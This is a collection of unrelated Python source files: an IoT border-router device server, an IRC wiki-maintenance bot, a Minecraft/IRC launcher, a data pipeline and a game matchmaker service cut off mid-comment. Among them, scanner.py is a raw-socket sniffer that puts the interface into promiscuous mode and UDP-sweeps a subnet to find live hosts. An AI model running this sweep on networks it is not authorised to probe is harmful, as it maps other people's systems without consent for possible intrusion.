p = re.compile(" (" + prefix + "[a-fA-F0-9:]+)(/| prefixlen )")
m = p.search(output)
if m:
return m.group(1)
p = re.compile(" ([a-fA-F0-9:]+)(/| prefixlen )")
m = p.search(output)
if m:
return m.group(1)
else:
print "----------"
print "ERROR: Failed to lookup device host address:"
print output
print "----------"
except Exception as e:
print "----------"
print e
print "ERROR: Failed to lookup device host address:", sys.exc_info()[0]
print "----------"
return default_host
def is_device_acceptable(self, host, device_type = 0):
if self._accept_nodes is None:
return True
if host.endswith(self._accept_nodes):
return True
return False
def _fetch_periodic(self, device):
t = []
t.append(tlvlib.create_get_tlv64(0, tlvlib.VARIABLE_UNIT_BOOT_TIMER))
if False and device.nstats_instance is not None:
t.append(nstatslib.create_nstats_tlv(device.nstats_instance))
if device.button_instance is not None:
t.append(tlvlib.create_set_vector_tlv(0, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 1,
struct.pack("!L", 1)))
t.append(tlvlib.create_set_vector_tlv(device.button_instance,
tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 2,
struct.pack("!LL", 1, 2)))
if device.motion_instance is not None:
if device.button_instance is None:
t.append(tlvlib.create_set_vector_tlv(0, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 1,
struct.pack("!L", 1)))
t.append(tlvlib.create_set_vector_tlv(device.motion_instance,
tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 2,
struct.pack("!LL", 1, 2)))
try:
device.log.debug("requesting periodic data: %s",tlvlib.get_tlv_short_info(t))
return device.send_tlv(t)
except socket.timeout:
device.log.error("failed to fetch from device (time out)")
return False
def setup(self):
# Discover the border router (NBR) and, if found, locate the serial radio
# and configure its beacons.
d = tlvlib.discovery(self.router_host)
print "Product label:", d[0][0]
if d[0][1] != tlvlib.INSTANCE_BORDER_ROUTER:
print "Error - could not find the radio - not starting the device server"
return False
i = 1
for data in d[1]:
print "Instance:",i , " type: %016x"%data[0], " ", data[1]
# check for radio and if found - configure beacons
if data[0] == tlvlib.INSTANCE_RADIO:
self.radio_instance = i
elif data[0] == tlvlib.INSTANCE_ROUTER:
self.router_instance = i
t = tlvlib.create_get_tlv(i, tlvlib.VARIABLE_NETWORK_ADDRESS, 2)
enc, t = tlvlib.send_tlv(t, self.router_host)
self.router_address = socket.inet_ntop(socket.AF_INET6, t[0].value)
print "\tRouter address:", self.router_address
self.router_prefix = socket.inet_ntop(socket.AF_INET6, t[0].value[0:8] + binascii.unhexlify("0000000000000000"))
#while self.router_prefix.endswith("::"):
# self.router_prefix = self.router_prefix[0:len(self.router_prefix) - 1]
print "\tNetwork prefix:",self.router_prefix
if self.device_server_host:
self.udp_address = self.device_server_host
else:
self.udp_address = self._lookup_device_host(self.router_prefix, socket.inet_ntop(socket.AF_INET6, t[0].value[0:8] + binascii.unhexlify("0000000000000001")))
print "\tNetwork address:",self.udp_address
elif data[0] == tlvlib.INSTANCE_BORDER_ROUTER_MANAGEMENT:
self.brm_instance = i
elif data[0] == tlvlib.INSTANCE_NETWORK_STATISTICS:
self.nstats_instance = i
i = i + 1
if not self.radio_instance:
print "Error - could not find the radio instance - not starting the device server"
return False
if not self.router_instance:
print "Error - could not find the router instance - not starting the device server"
return False
# Setup socket to make sure it is possible to bind the address
try:
self._sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind((self.udp_address, self.udp_port))
#self._sock.bind(('', self.udp_port))
self._sock.settimeout(1.0)
self._sock4 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self._sock4.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock4.bind(('localhost', self.udp_port))
self._sock4.settimeout(1.0)
except Exception as e:
print e
print "Error - could not bind to the address", self.udp_address
return False
# set radio channel and panid
self.set_channel_panid()
# set-up beacon to ...
IPv6Str = binascii.hexlify(socket.inet_pton(socket.AF_INET6, self.udp_address))
BEACON = "fe02010a020090da01%08x"%self.location + "18020090da03" + IPv6Str + "%4x"%self.udp_port + "000000"
beacon_payload = binascii.unhexlify(BEACON)
print "Setting beacon with length",len(beacon_payload),"in instance", self.radio_instance
print "\t",BEACON
t = tlvlib.create_set_vector_tlv(self.radio_instance,
tlvlib.VARIABLE_RADIO_BEACON_RESPONSE,
0, 0, len(beacon_payload) / 4,
beacon_payload)
enc, t = tlvlib.send_tlv(t, self.router_host)
# print "Result:"
# tlvlib.print_tlv(t[0])
return True
def stop(self):
self.running = False
# sys.exit(0)
def wakeup(self, host, time=60):
device = self.get_device(host)
if device is not None:
self._wakeup_device(device, time)
elif host == "all" or host == "*":
for dev in self.get_devices():
if dev.is_sleepy_device():
self._wakeup_device(dev, time)
else:
print "could not find device with address",host
def _wakeup_device(self, device, time):
if device.is_sleepy_device() and device.sleep_instance is not None:
print "requesting [" + device.address + "] to wakeup"
t = tlvlib.create_set_tlv32(device.sleep_instance,
tlvlib.VARIABLE_SLEEP_AWAKE_TIME_WHEN_NO_ACTIVITY,
time * 1000L)
device.send_tlv(t)
else:
print device.address,"is not a sleepy device"
def set_channel_panid(self):
# set radio channel
t1 = tlvlib.create_set_tlv32(self.radio_instance,
tlvlib.VARIABLE_RADIO_CHANNEL,
self.radio_channel)
# set radio PAN ID
t2 = tlvlib.create_set_tlv32(self.radio_instance,
tlvlib.VARIABLE_RADIO_PAN_ID,
self.radio_panid)
tlvlib.send_tlv([t1,t2], self.router_host)
def _udp_receive(self, sock):
print "UDP Receive - on socket: ", sock
while self.running:
try:
data, addr = sock.recvfrom(1024)
if not self.running:
return
# print "Received from ", addr, binascii.hexlify(data)
if len(addr) > 2:
host, port, _, _ = addr
else:
host, port = addr
device = self.get_device(host)
enc = tlvlib.parse_encap(data)
if enc.error != 0:
self.log.error("[%s] RECV ENCAP ERROR %s", host, str(enc.error))
elif enc.payload_type == tlvlib.ENC_PAYLOAD_TLV:
self._process_incoming_tlvs(sock, host, port, device, enc, data[enc.size():])
else:
self.log.error("[%s] RECV ENCAP UNHANDLED PAYLOAD %s", host, str(enc.payload_type))
except socket.timeout:
pass
def serve_forever(self):
# Initialize if not already initialized
if not self.router_instance:
if not self.setup():
# Initialization failed
return False
self.log.info("Device server started at [%s]:%d", self.udp_address, self.udp_port)
self.running = True
# do device management periodically
t1 = threading.Thread(target=self._manage_devices)
t1.daemon = True
t1.start()
# sock4 socket
t2 = threading.Thread(target=self._udp_receive, args=[self._sock4])
t2.daemon = True
t2.start()
self._udp_receive(self._sock)
t2.join()
t1.join()
self._sock.close()
self._sock4.close()
exit(0)
def _process_incoming_tlvs(self, sock, host, port, device, enc, data):
tlvs = tlvlib.parse_tlvs(data)
if device is not None:
last_seen = device.last_seen
device.last_seen = time.time();
device.log.debug("RECV %s",tlvlib.get_tlv_short_info(tlvs))
else:
last_seen = time.time()
self.log.debug("[%s] RECV %s",host,tlvlib.get_tlv_short_info(tlvs))
ping_device = False
dev_watchdog = None
dev_type = 0
# print " Received TLVs:"
# tlvlib.print_tlvs(tlvs)
for tlv in tlvs:
if tlv.error != 0:
if device is not None:
device.log.error("Received error (" + str(tlv.error) + "):")
else:
self.log.error("[%s] Received error:", host)
tlvlib.print_tlv(tlv)
elif tlv.instance == 0 and tlv.op == tlvlib.TLV_GET_RESPONSE:
if tlv.variable == tlvlib.VARIABLE_OBJECT_TYPE:
dev_type = tlv.int_value
elif tlv.variable == tlvlib.VARIABLE_UNIT_BOOT_TIMER:
pass
elif tlv.variable == tlvlib.VARIABLE_TIME_SINCE_LAST_GOOD_UC_RX:
if device is not None and time.time() - last_seen > 55:
ping_device = True
elif tlv.variable == tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG:
dev_watchdog = tlv.int_value
if not device:
if dev_watchdog is not None or self.grab_all == 0:
if dev_type == tlvlib.INSTANCE_BORDER_ROUTER:
# Do not try to grab the border router
pass
elif not self.is_device_acceptable(host, dev_type):
self.log.debug("[%s] IGNORING device of type 0x%016x that could be taken over", host, dev_type)
else:
# Unknown device - do a grab attempt
if dev_watchdog is not None:
self.log.debug("[%s] FOUND new device of type 0x%016x that can be taken over - WDT = %d", host, dev_type, dev_watchdog)
if self.grab_device(host):
device = self._add_device(sock, host, port)
device.next_update = time.time() + self.watchdog_time - self.guard_time
self.discover_device(device)
elif device.is_discovered():
# time.sleep(0.005)
device._process_tlvs(tlvs)
if not device.is_sleepy_device() and ping_device and device.get_pending_packet_count() == 0:
t = tlvlib.create_get_tlv64(0, tlvlib.VARIABLE_UNIT_BOOT_TIMER)
device.send_tlv(t)
device._flush()
else:
self.discover_device(device)
def usage():
print "Usage:",sys.argv[0],"[-b bind-address] [-a host] [-c channel] [-P panid] [-t node-address-list] [-g 0/1] [-nocli] [device]"
exit(0)
if __name__ == "__main__":
# stuff only to run when not called via 'import' here
manage_device = None
arg = 1
start_cli = True
logging.basicConfig(format='%(asctime)s [%(name)s] %(levelname)s - %(message)s', level=logging.DEBUG)
server = DeviceServer()
while len(sys.argv) > arg + 1:
if sys.argv[arg] == "-a":
server.router_host = sys.argv[arg + 1]
elif sys.argv[arg] == "-c":
server.radio_channel = tlvlib.decodevalue(sys.argv[arg + 1])
elif sys.argv[arg] == "-P":
server.radio_panid = tlvlib.decodevalue(sys.argv[arg + 1])
elif sys.argv[arg] == "-b":
server.device_server_host = sys.argv[arg + 1]
elif sys.argv[arg] == "-g":
server.grab_all = tlvlib.decodevalue(sys.argv[arg + 1])
elif sys.argv[arg] == "-t":
server._accept_nodes = tuple(sys.argv[arg + 1].split(','))
elif sys.argv[arg] == "-nocli":
start_cli = False
else:
break
arg += 2
if len(sys.argv) > arg:
if sys.argv[arg] == "-h":
usage()
if sys.argv[arg].startswith("-"):
usage()
manage_device = sys.argv[arg]
arg += 1
if len(sys.argv) > arg:
print "Too many arguments"
exit(1)
try:
if not server.setup():
print "No border router found. Please make sure a border router is running!"
sys.exit(1)
except socket.timeout:
print "No border router found. Please make sure a border router is running!"
sys.exit(1)
except Exception as e:
print e
print "Failed to connect to border router."
sys.exit(1)
if start_cli:
dscli.start_cli(server)
if manage_device:
server.add_device(manage_device)
server.serve_forever()
if server.running:
server.log.error("*** device server stopped")
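# --- Illustrative usage sketch (added for clarity; not part of the original script) ---
# The DeviceServer can also be driven programmatically; a listener callback
# receives the DeviceEvent instances emitted above (EVENT_DISCOVERY,
# EVENT_BUTTON, EVENT_MOTION, EVENT_NSTATS_RPL):
#
#   def on_event(event):
#       print "event:", event.event_type, "from", event.device.address
#
#   server = DeviceServer()
#   server.add_event_listener(on_event)
#   if server.setup():
#       server.serve_forever()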
|
maintainer.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
A wiki-maintainer script that shares tasks between workers and requires no intervention.
This script requires the Python IRC library http://python-irclib.sourceforge.net/
Warning: experimental software, use at your own risk
"""
__version__ = '$Id: 55d29d9f38fc751e8f84d9b459641cdd02b25d25 $'
# Author: Balasyum
# http://hu.wikipedia.org/wiki/User:Balasyum
import random
import thread
import threading
import time
import rciw
import censure
import wikipedia as pywikibot
import externals
externals.check_setup('irclib')
from ircbot import SingleServerIRCBot
from irclib import nm_to_n
ver = 1
site = pywikibot.getSite()
site.forceLogin()
class rcFeeder(SingleServerIRCBot):
def __init__(self, channel, nickname, server, port=6667):
SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
self.channel = channel
self.rcbot = rciw.IWRCBot(site)
self.tasks = []
def on_nicknameinuse(self, c, e):
c.nick(c.get_nickname() + "_")
def on_welcome(self, c, e):
c.join(self.channel)
def on_privmsg(self, c, e):
pass
def on_pubmsg(self, c, e):
try:
msg = unicode(e.arguments()[0],'utf-8')
except UnicodeDecodeError:
return
name = msg[8:msg.find(u'14',9)]
if 'rciw' in self.tasks:
self.rcbot.addQueue(name)
if 'censure' in self.tasks:
thread.start_new_thread(censure.checkPage, (name, True))
def on_dccmsg(self, c, e):
pass
def on_dccchat(self, c, e):
pass
def on_quit(self, e, cmd):
pass
class MaintcontBot(SingleServerIRCBot):
def __init__(self, nickname, server, port=6667):
SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
feederThread = threading.Thread(target=self.feederBot)
feederThread.setDaemon(True)
feederThread.start()
def feederBot(self):
self.feed = rcFeeder('#%s.%s' % (site.language(), site.family.name),
site.loggedInAs(), "irc.wikimedia.org")
self.feed.start()
def on_nicknameinuse(self, c, e):
c.nick("mainter" + str(random.randrange(100, 999)))
def on_welcome(self, c, e):
self.connection.privmsg("maintcont",
"workerjoin %s.%s %s"
% (site.language(), site.family.name,
str(ver)))
def on_privmsg(self, c, e):
nick = nm_to_n(e.source())
c = self.connection
cmd = e.arguments()[0]
do = cmd.split()
if do[0] == "accepted":
print "Joined the network"
thread.start_new_thread(self.activator,())
elif do[0] == "tasklist" and len(do) > 1:
self.feed.tasks = do[1].split('|')
def on_dccmsg(self, c, e):
pass
def on_dccchat(self, c, e):
pass
def activator(self):
while True:
self.connection.privmsg("maintcont", "active")
time.sleep(10)
class Maintainer:
def __init__(self):
controllThread = threading.Thread(target=self.controllBot)
controllThread.setDaemon(True)
controllThread.start()
while True:
raw_input()
def controllBot(self):
bot = MaintcontBot("mainter%s" % str(random.randrange(100, 999)),
"irc.freenode.net")
bot.start()
if __name__ == "__main__":
Maintainer()
|
main.py
|
from minecraft import Minecraft
from ircd import IRC
import threading
thread_lock = threading.Lock()
def main():
mc = Minecraft()
irc = IRC()
mc.set_irc(irc)
irc.set_mc(mc)
mc.set_thread_lock(thread_lock)
irc.set_thread_lock(thread_lock)
th = threading.Thread(target=irc.run)
th.start()
mc.run() # keep things running
irc.run()
if __name__ == "__main__":
main()
|
scanner.py
|
import socket
import os
import struct
import threading
import time
from netaddr import IPNetwork, IPAddress
from ctypes import *
"""
This script sniffs network packets received by a given host and decodes them
to show packet type, source, and destination in human-readable form.
Note: Promiscuous mode is needed, which requires administrative privileges
on Windows or root on Linux.
"""
# Host to listen on
if os.name == "nt":
# Windows
HOST = "192.168.1.114"
SOCKET_PROTOCOL = socket.IPPROTO_IP
else:
HOST = "192.168.1.115"
SOCKET_PROTOCOL = socket.IPPROTO_ICMP
# Subnet to target
subnet = "192.168.0.0/24"
# String to print for ICMP responses
magic_message = "PYTHON"
class IP (Structure):
_fields_ = [
("ihl", c_uint8, 4),
("version", c_uint8, 4),
("tos", c_uint8),
("len", c_uint16),
("id", c_uint16),
("offset", c_uint16),
("ttl", c_uint8),
("protocol_num", c_uint8),
("sum", c_uint16),
("src", c_uint32),
("dst", c_uint32)
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
# Map protocol constants to their names
# TODO: Map remaining IP protocol numbers.
self.protocol_map = {
1: "ICMP",
2: "IGMP",
6: "TCP",
17: "UDP"
}
# Human readable IP addresses
self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))
# Human readable protocol
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
class ICMP (Structure):
_fields_ = [
("type", c_uint8),
("code", c_uint8),
("checksum", c_uint16),
("unused", c_uint16),
("next_hop_mtu", c_uint16)
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer):
pass
def udp_sender(subnet, magic_message):
time.sleep(5) # Sleep for 5 seconds
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(magic_message, ("{}".format(ip), 65212))
except:
pass
def main():
# Create a raw socket and bind it to the public interface
# Windows allows us to sniff all incoming packets regardless of protocol.
# Linux forces us to specify that we are sniffing ICMP.
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, SOCKET_PROTOCOL)
sniffer.bind((HOST, 0))
# Set the socket options to include IP headers in the capture
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# If we are using Windows, we need to send an IOCTL to turn on promiscuous mode.
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
try:
print("Sniffing {} packets:\n".format(sniffer.getsockname()))
t = threading.Thread(target=udp_sender, args=(subnet, magic_message))
t.start()
while True:
# Read in a packet
# TODO: Linux not sniffing packets.
raw_buffer = sniffer.recvfrom(65565)[0]
# Create an IP header from the first 20 bytes of the buffer
ip_header = IP(raw_buffer[0:20])
# Print out the protocol that was detected and the hosts
print("Protocol: {} {} -> {}".format(ip_header.protocol, ip_header.src_address, ip_header.dst_address))
# Grab the packet if it is ICMP
if ip_header.protocol == "ICMP":
# Calculate where the ICMP packet starts.
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + sizeof(ICMP)]
# Create our ICMP structure
icmp_header = ICMP(buf)
print("ICMP -> Type {} Code: {}".format(icmp_header.type, icmp_header.code))
# Check for ICMP TYPE 3 and CODE 3 (destination/port unreachable)
if (icmp_header.code == 3) and (icmp_header.type == 3):
# Make sure host is in our target subnet
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
# Make sure it has our magic message.
if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message:
print("Host Up: {}".format(ip_header.src_address))
# Handle CTRL-C
except KeyboardInterrupt:
# If we are using Windows, turn off promiscuous mode.
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
if __name__ == '__main__':
main()
|
pipeline.py
|
import time
from collections import OrderedDict
from itertools import chain, cycle
from threading import Thread
from .queue import AsyncQueue, Signal, StubQueue, VoidQueue, is_stop_signal
from .timer import TimerGroup, IncrementalTimer
class PipelineStep:
def __init__(self):
self.input_queue = None
self.output_queue = VoidQueue()
self.working = False
self.timers = TimerGroup()
self.total_time = IncrementalTimer()
self.own_time = IncrementalTimer()
self._start_t = None
self._thread = None
def process(self, item):
raise NotImplementedError
def end(self):
pass
def setup(self):
pass
def start(self):
if self.input_queue is None or self.output_queue is None:
raise Exception("No input or output queue")
if self._thread is not None:
raise Exception("Thread is already running")
self._thread = Thread(target=self._run)
self._thread.start()
self.working = True
def join(self):
print("finishing {}".format(self))
self.input_queue.put(Signal.STOP)
self._thread.join()
self._thread = None
self.working = False
def _run(self):
self._start_t = time.time()
self.setup()
self.total_time = IncrementalTimer()
self.own_time = IncrementalTimer()
while True:
self.total_time.tick()
item = self.input_queue.get()
if self._check_output(item):
break
self.own_time.tick()
output = self.process(item)
self.own_time.tock()
if self._check_output(output):
break
self.total_time.tock()
self.input_queue.task_done()
self.output_queue.put(output)
self.input_queue.close()
self.end()
self.working = False
def _check_output(self, item):
if is_stop_signal(item):
self.output_queue.put(item)
return True
return False
class AsyncPipeline:
def __init__(self):
self.steps = OrderedDict()
self.sync_steps = OrderedDict()
self.async_step = []
self._void_queue = VoidQueue()
self._last_step = None
self._last_parallel = False
def add_step(self, name, new_pipeline_step, max_size=100, parallel=True):
new_pipeline_step.output_queue = self._void_queue
if self._last_step:
if parallel or self._last_parallel:
queue = AsyncQueue(maxsize=max_size)
else:
queue = StubQueue()
self._last_step.output_queue = queue
new_pipeline_step.input_queue = queue
else:
new_pipeline_step.input_queue = self._void_queue
if parallel:
self.steps[name] = new_pipeline_step
else:
self.sync_steps[name] = new_pipeline_step
self._last_step = new_pipeline_step
self._last_parallel = parallel
def run(self):
for step in self.steps.values():
if not step.working:
step.start()
self._run_sync_steps()
def close(self):
for step in self.steps.values():
step.input_queue.put(Signal.STOP_IMMEDIATELY)
for step in self.steps.values():
step.join()
def print_statistics(self):
for name, step in chain(self.sync_steps.items(), self.steps.items(), ):
print("{} total: {}".format(name, step.total_time))
print("{} own: {}".format(name, step.own_time))
def _run_sync_steps(self):
"""Run steps in main thread"""
if not self.sync_steps:
while not self._void_queue.finished:
pass
return
for step in self.sync_steps.values():
step.working = True
step.setup()
for step in cycle(self.sync_steps.values()):
step.total_time.tick()
item = step.input_queue.get()
if is_stop_signal(item):
step.input_queue.close()
step.output_queue.put(item)
break
step.own_time.tick()
output = step.process(item)
step.own_time.tock()
if is_stop_signal(output):
step.input_queue.close()
step.output_queue.put(output)
break
step.total_time.tock()
step.output_queue.put(output)
for step in self.sync_steps.values():
step.working = False
step.end()
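# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# A minimal pipeline, assuming two hypothetical PipelineStep subclasses named
# Decoder and Renderer that implement process():
#
#   pipeline = AsyncPipeline()
#   pipeline.add_step("decode", Decoder(), parallel=True)    # runs in its own thread
#   pipeline.add_step("render", Renderer(), parallel=False)  # runs in the main thread
#   pipeline.run()               # starts worker threads, then drives the sync steps
#   pipeline.close()             # sends STOP_IMMEDIATELY and joins worker threads
#   pipeline.print_statistics()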
|
matchmaker_service.py
|
import firebase_admin
from firebase_admin import credentials, firestore
from game import Game
from game_engine import messages
from game_engine.common import GameOptions, GameSchedule, STV_I18N_TABLE, ISODayOfWeek, log_message
from game_engine.database import Database
from game_engine.engine import Engine
from game_engine.firestore import FirestoreDB
from game_engine.matchmaker import MatchMakerInterface
from game_engine.matchmaker import MatchMakerError
from game_engine.twilio import TwilioSMSNotifier
from game_engine.twilio import SMSNotifier
from test_game import MockDatabase, MockPlayEngine
from google.cloud.firestore_v1.document import DocumentSnapshot
from typing import Text
import time
import threading
import datetime
from game_engine import events
from multiprocessing import Process
import multiprocessing
_FIRESTORE_PROD_CONF_JSON_PATH = ''
_TEST_FIRESTORE_INSTANCE_JSON_PATH = '../firebase/stv-game-db-test-4c0ec2310b2e.json'
json_config_path = _TEST_FIRESTORE_INSTANCE_JSON_PATH
_AMAZON_SQS_PROD_CONF_JSON_PATH = '../amazon/stopthevirus.fifo.json'
_TEST_AMAZON_SQS_CONFIG_PATH = '../amazon/stopthevirus.fifo.json'
_TEST_TWILIO_SMS_CONFIG_PATH = '../twilio/stv-twilio-service-test.json'
def _twilio_client(game_id: Text) -> TwilioSMSNotifier:
return TwilioSMSNotifier(
json_config_path=_TEST_TWILIO_SMS_CONFIG_PATH,
game_id=game_id)
class MatchmakerService:
# Handles scheduling and communication with other services for starting games
# TODO(David): Add function to run all games that are supposed to be running at start (in MVP/test)
def __init__(self, matchmaker: MatchMakerInterface, gamedb: Database, json_config_path: str = json_config_path,
region: str = "US", min_players: int = 5, is_mvp: bool = True, game_options: GameOptions = None):
self._matchmaker = matchmaker
self._gamedb = gamedb
self._min_players = min_players
self._region = region
self._is_mvp = is_mvp
self._stop = threading.Event()
self._daemon_started = False
self._game_options = game_options
def _get_sms_notifier(self, game_id: str) -> SMSNotifier:
return _twilio_client(game_id=game_id)
def _notify_players(self, game_id: Text, players: list, message: Text):
twilio = self._get_sms_notifier(game_id=game_id)
# iterate over players and get their phone numbers
recipient_phone_numbers = list(
map(lambda player: player.to_dict().get("phone_number"), players))
# filter out players with no phone number
filtered_phone_numbers = list(
filter(lambda number: not not number, recipient_phone_numbers))
twilio.send_bulk_sms(
message=message,
recipient_addresses=filtered_phone_numbers
)
log_message(message="Notified players with message:{}".format(
message), game_id=game_id)
def _play_game(self, game: Game, game_snap: DocumentSnapshot, players: list, game_dict: dict, is_test: bool = False):
log_message("Starting a game", game_id=game_dict.get(
"id"), additional_tags=game_dict)
if is_test:
database = MockDatabase()
engine = MockPlayEngine().CreateEngine(database)
else:
# NOTE(brandon): the game DB instance used by the matchmaker is for searching over all games. when we create
# a game instance, we also supply new game DB and engine objects that have the specific game ID.
database = FirestoreDB(
json_config_path=json_config_path, game_id=game._game_id)
engine = Engine(options=game._options,
game_id=game._game_id,
sqs_config_path=_TEST_AMAZON_SQS_CONFIG_PATH,
twilio_config_path=_TEST_TWILIO_SMS_CONFIG_PATH,
gamedb=database
)
try:
game_data = self._matchmaker.generate_tribes(
game_id=game._game_id, players=players, game_options=game._options, gamedb=database)
tribes = game_data['tribes']
message = messages.NOTIFY_GAME_STARTED_EVENT_MSG_FMT.format(
header=messages.game_sms_header(
hashtag=game_dict.get('hashtag')),
game=game_dict.get('hashtag')
)
self._notify_players(game_id=game._game_id,
players=players, message=message)
if self._is_mvp:
# NOTE(brandon): changing to thread for now. can't pickle non-primitive engine object.
game_thread = threading.Thread(target=game.play, args=(
tribes[0], tribes[1], database, engine))
game_thread.start()
else:
# start on new GCP instance
pass
except MatchMakerError as e:
# Catches error from matchmaker algorithm
message = "Matchmaker Error: {}".format(e)
log_message(message=message,
game_id=game._game_id)
self._set_game_has_started(
game_snap=game_snap, game=game, value=False)
self._notify_players(game_id=game._game_id,
players=players, message=message)
self._reschedule_or_cancel_game(
game_snap=game_snap, game_dict=game_dict, players=players)
def _start_game(self, game: Game, game_snap: DocumentSnapshot, players: list, game_dict: dict, is_test: bool = False):
self._set_game_has_started(game_snap=game_snap, game=game)
self._play_game(game=game, game_snap=game_snap,
players=players, game_dict=game_dict, is_test=is_test)
def _set_game_has_started(self, game_snap: DocumentSnapshot, game: Game, value: bool = True):
field_updates = {
'game_has_started': value
}
try:
game_snap.reference.update(field_updates)
log_message(message="Set game_has_started field to {}".format(
value), game_id=game._game_id)
except Exception as e:
log_message(message="Error setting game document game_has_started field to {}: {}".format(
value, e), game_id=game._game_id)
raise RuntimeError(str(e))
def _reschedule_or_cancel_game(self, game_snap: DocumentSnapshot, game_dict: dict, players: list):
log_message(message="Rescheduling or cancelling game",
game_id=game_dict.get("id"))
now_date = datetime.datetime.utcnow().strftime('%Y-%m-%d')
if 'times_rescheduled' not in game_dict:
game_dict['times_rescheduled'] = 0
if 'max_reschedules' not in game_dict:
game_dict['max_reschedules'] = 1
        times_rescheduled = game_dict.get("times_rescheduled") or 0
        if times_rescheduled < game_dict["max_reschedules"]:
            # Reschedule the game by setting the current UTC date as
            # last_checked_date; the server will then skip this game until the
            # following week.
            field_updates = {
                'last_checked_date': now_date,
                'times_rescheduled': times_rescheduled + 1
            }
try:
game_snap.reference.update(field_updates)
log_message(message="Game successfully rescheduled",
game_id=game_dict.get("id"))
schedule = STV_I18N_TABLE[self._region]
notif_message = messages.NOTIFY_GAME_RESCHEDULED_EVENT_MSG_FMT.format(
header=messages.game_sms_header(
hashtag=game_dict.get('hashtag')),
game=game_dict.get("hashtag"),
reason="insufficient players",
date=schedule.nextweek_localized_string,
time=schedule.localized_time_string(
schedule.daily_challenge_start_time
)
)
self._notify_players(game_id=game_dict.get(
"id"), players=players, message=notif_message)
except Exception as e:
log_message(message="Error rescheduling game: {}".format(
e), game_id=game_dict.get("id"))
else:
self._cancel_game(game_snap=game_snap, players=players)
def _cancel_game(self, game_snap: DocumentSnapshot, players: list, reason: str = "insufficient players") -> None:
# Cancel the game
game_dict = game_snap.to_dict()
field_updates = {
'to_be_deleted': True,
}
game_snap.reference.update(field_updates)
log_message(
message="Cancelled the game (set to_be_deleted flag)", game_id=game_dict.get("id"))
notif_message = messages.NOTIFY_GAME_CANCELLED_EVENT_MSG_FMT.format(
header=messages.game_sms_header(hashtag=game_dict.get('hashtag')),
game=game_dict.get("hashtag"),
reason=reason
)
self._notify_players(game_id=game_dict.get(
"id"), players=players, message=notif_message)
def _check_start_time(self, schedule: GameSchedule,
now_dt_with_tz: datetime.datetime,
is_test: bool = False):
start_day = schedule.game_start_day_of_week.value
start_time = schedule.game_start_time
localized_time = now_dt_with_tz.astimezone(schedule.game_time_zone)
now_day = localized_time.isoweekday()
now_time = localized_time.time()
if is_test:
now_day = start_day
now_time = start_time
return now_day == start_day and now_time >= start_time
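    # Example for _check_start_time (illustrative): with a schedule whose
    # game_start_day_of_week is Saturday and game_start_time is 12:00 in the
    # schedule's time zone, this returns True at any point on Saturday at or
    # after 12:00 local time, and False otherwise (is_test forces a match).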
def _matchmaker_function(self, sleep_seconds: int = 60, is_test: bool = False):
log_message("Starting matchmaker for region={}".format(self._region))
while not self._stop.is_set():
games = self._gamedb.find_matchmaker_games(region=self._region)
if len(games) >= 1:
for game_snap in games:
game_dict = game_snap.to_dict()
players_stream = game_snap.reference.collection(
"players").stream()
players_list = []
for player in players_stream:
players_list.append(player)
if self._region in STV_I18N_TABLE:
schedule = STV_I18N_TABLE[self._region]
else:
schedule = STV_I18N_TABLE['US']
try:
now_utc = datetime.datetime.utcnow().strftime('%Y-%m-%d')
if self._check_start_time(schedule=schedule, now_dt_with_tz=datetime.datetime.now().astimezone(),
is_test=is_test) and now_utc != game_dict.get("last_checked_date"): # TODO: Do these checks in query
if game_dict["count_players"] >= self._min_players:
if self._game_options is None:
self._game_options = GameOptions(
game_schedule=schedule, game_wait_sleep_interval_sec=1 if is_test else 30)
g = Game(
game_id=game_dict["id"], options=self._game_options)
self._start_game(
game=g, game_snap=game_snap, players=players_list, game_dict=game_dict, is_test=is_test)
else:
self._reschedule_or_cancel_game(
game_snap=game_snap, game_dict=game_dict, players=players_list)
except Exception as e:
log_message(
f"Game {str(game_dict)} is corrupt: {str(e)} Cancelling.")
self._cancel_game(game_snap=game_snap, players=players_list,
reason="an internal data corruption error")
time.sleep(sleep_seconds)
log_message("Stopped matchmaker for region={}".format(self._region))
def start_matchmaker_daemon(self, sleep_seconds: int = 60, is_test: bool = False):
if not self._daemon_started and not self._stop.is_set():
self._thread = threading.Thread(
target=self._matchmaker_function, args=(sleep_seconds, is_test))
self._daemon_started = True
self._thread.start()
else:
log_message(
"Failed to start new matchmaker for region={} (matchmaker already running)".format(self._region))
def set_stop(self):
log_message(
"Received stop signal for matchmaker in region={}".format(self._region))
self._stop.set()
# Wait for thread to finish executing/sleeping. This may take a long time
self._thread.join()
self._daemon_started = False
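    # Usage sketch for MatchmakerService (illustrative, not part of the
    # original service). "RoundRobinMatchMaker" is a hypothetical
    # MatchMakerInterface implementation and the FirestoreDB constructor
    # arguments are assumptions; substitute whatever the deployment uses.
    #
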